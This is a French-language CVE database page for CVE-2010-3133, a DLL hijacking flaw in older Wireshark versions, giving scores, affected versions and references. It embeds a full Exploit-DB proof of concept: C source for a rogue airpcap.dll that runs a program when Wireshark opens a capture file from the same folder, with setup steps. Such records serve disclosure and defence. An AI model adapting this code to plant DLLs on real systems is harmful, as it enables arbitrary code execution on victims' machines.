CVE-2010-3133 : Détail

CVE-2010-3133

1.57%V3
Network
2010-08-26
16h00 +00:00
2017-09-18
10h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Untrusted search path vulnerability in Wireshark 0.8.4 through 1.0.15 and 1.2.0 through 1.2.10 allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse airpcap.dll, and possibly other DLLs, that is located in the same folder as a file that automatically launches Wireshark.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 14721

Date de publication : 2010-08-23 22h00 +00:00
Auteur : TheLeader
EDB Vérifié : Yes

/* Exploit Title: Wireshark <= 1.2.10 DLL Hijacking Exploit (airpcap.dll) Date: 24/08/2010 Author: TheLeader Email: gsog2009 [a7] hotmail [d0t] com Software Link: http://www.wireshark.org/download.html Version: 1.2.10 and prior Tested on: Windows 7 x86 (6.1.7600) As seen on Metasploit blog (rock on HDM!): http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html Probably gonna see alot of these bugs getting exploited in the near future.. Compile and rename to airpcap.dll, create a file in the same dir with one of the following extensions. Default Wireshark file extension associations: .5vw / .acp / .apc / .atc / .bfr / .cap / .enc / .erf / .fdc / .pcap / .pcapng / .pkt / .rf5 / .snoop / .syc / .tpc / .tr1 / .trace / .trc / .wpc / .wpz Double click & watch a nice calculator pop =] Shouts to all the great guys at forums.hacking.org.il */ #include <windows.h> #define DLLIMPORT __declspec (dllexport) DLLIMPORT void AirpcapGetDeviceList() { evil(); } DLLIMPORT void AirpcapFreeDeviceList() { evil(); } DLLIMPORT void AirpcapOpen() { evil(); } DLLIMPORT void AirpcapClose() { evil(); } DLLIMPORT void AirpcapGetLinkType() { evil(); } DLLIMPORT void AirpcapSetLinkType() { evil(); } DLLIMPORT void AirpcapSetKernelBuffer() { evil(); } DLLIMPORT void AirpcapSetFilter() { evil(); } DLLIMPORT void AirpcapGetMacAddress() { evil(); } DLLIMPORT void AirpcapSetMinToCopy() { evil(); } DLLIMPORT void AirpcapGetReadEvent() { evil(); } DLLIMPORT void AirpcapRead() { evil(); } DLLIMPORT void AirpcapGetStats() { evil(); } DLLIMPORT void AirpcapTurnLedOn() { evil(); } DLLIMPORT void AirpcapTurnLedOff() { evil(); } DLLIMPORT void AirpcapGetDeviceChannel() { evil(); } DLLIMPORT void AirpcapSetDeviceChannel() { evil(); } DLLIMPORT void AirpcapGetFcsPresence() { evil(); } DLLIMPORT void AirpcapSetFcsPresence() { evil(); } DLLIMPORT void AirpcapGetFcsValidation() { evil(); } DLLIMPORT void AirpcapSetFcsValidation() { evil(); } DLLIMPORT void AirpcapGetDeviceKeys() { evil(); } DLLIMPORT void AirpcapSetDeviceKeys() { evil(); } DLLIMPORT void AirpcapGetDecryptionState() { evil(); } DLLIMPORT void AirpcapSetDecryptionState() { evil(); } DLLIMPORT void AirpcapStoreCurConfigAsAdapterDefault() { evil(); } DLLIMPORT void AirpcapGetVersion() { evil(); } DLLIMPORT void AirpcapGetDriverDecryptionState() { evil(); } DLLIMPORT void AirpcapSetDriverDecryptionState() { evil(); } DLLIMPORT void AirpcapGetDriverKeys() { evil(); } DLLIMPORT void AirpcapSetDriverKeys() { evil(); } DLLIMPORT void AirpcapSetDeviceChannelEx() { evil(); } DLLIMPORT void AirpcapGetDeviceChannelEx() { evil(); } DLLIMPORT void AirpcapGetDeviceSupportedChannels() { evil(); } int evil() { WinExec("calc", 0); exit(0); return 0; }

Products Mentioned

Configuraton 0

Wireshark>>Wireshark >> Version To (including) 1.2.10

Wireshark>>Wireshark >> Version 0.99.2

Wireshark>>Wireshark >> Version 0.99.3

Wireshark>>Wireshark >> Version 0.99.4

Wireshark>>Wireshark >> Version 0.99.5

Wireshark>>Wireshark >> Version 0.99.6

Wireshark>>Wireshark >> Version 0.99.7

Wireshark>>Wireshark >> Version 0.99.8

Wireshark>>Wireshark >> Version 1.0.0

Wireshark>>Wireshark >> Version 1.0.1

Wireshark>>Wireshark >> Version 1.0.2

Wireshark>>Wireshark >> Version 1.0.3

Wireshark>>Wireshark >> Version 1.0.4

Wireshark>>Wireshark >> Version 1.0.5

Wireshark>>Wireshark >> Version 1.0.6

Wireshark>>Wireshark >> Version 1.0.7

Wireshark>>Wireshark >> Version 1.0.8

Wireshark>>Wireshark >> Version 1.0.9

Wireshark>>Wireshark >> Version 1.0.10

Wireshark>>Wireshark >> Version 1.0.11

Wireshark>>Wireshark >> Version 1.0.12

Wireshark>>Wireshark >> Version 1.2.0

Wireshark>>Wireshark >> Version 1.2.1

Wireshark>>Wireshark >> Version 1.2.2

Wireshark>>Wireshark >> Version 1.2.3

Wireshark>>Wireshark >> Version 1.2.4

Wireshark>>Wireshark >> Version 1.2.5

Wireshark>>Wireshark >> Version 1.2.6

Wireshark>>Wireshark >> Version 1.2.7

Wireshark>>Wireshark >> Version 1.2.8

Wireshark>>Wireshark >> Version 1.2.9

Références

http://www.exploit-db.com/exploits/14721/
Tags : exploit, x_refsource_EXPLOIT-DB
http://secunia.com/advisories/41064
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2010/2165
Tags : vdb-entry, x_refsource_VUPEN
http://www.vupen.com/english/advisories/2010/2243
Tags : vdb-entry, x_refsource_VUPEN